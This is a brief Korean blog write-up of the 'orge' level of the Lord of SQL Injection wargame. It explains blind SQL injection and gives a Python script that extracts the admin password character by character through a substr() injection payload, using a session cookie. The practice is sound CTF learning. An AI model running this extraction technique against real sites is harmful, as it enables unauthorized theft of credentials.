반응형
blind sql injection이다
먼저 pw 길이를 알아내기 위하여 lenght함수를 사용하였다.
pw='||lenght(pw)8%23을 입력해 주었더니 hello admin을 볼 수 있었다.
import requests
cookies= {'PHPSESSID':'7a4pokemhooffbduohsbglc420'}
url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?'
pw = ''
for i in range(1,9):
for j in range(33,127):
payload = "pw=' || id='admin' %26%26 substr(pw,1,"+str(i)+")='"+pw+chr(j)+"#"
new_url = url+payload
res = requests.get(new_url, cookies=cookies)
res.raise_for_status()
if "Hello admin" in res.text :
pw += chr(j)
print("pw: "+pw)
break
print ("pw : "+pw)
반응형
'Write-Up > LOS (lord of sql injection)' 카테고리의 다른 글
| [Lord of SQL Injection] 9번 vampire (0) | 2021.01.21 |
|---|---|
| [Lord of SQL Injection] 8번 troll (0) | 2021.01.21 |
| [Lord of SQL Injection] 6번 darkelf (0) | 2021.01.21 |
| [Lord of SQL Injection] 5번 wolfman (0) | 2021.01.21 |
| [Lord of SQL Injection] 4번 orc (0) | 2021.01.21 |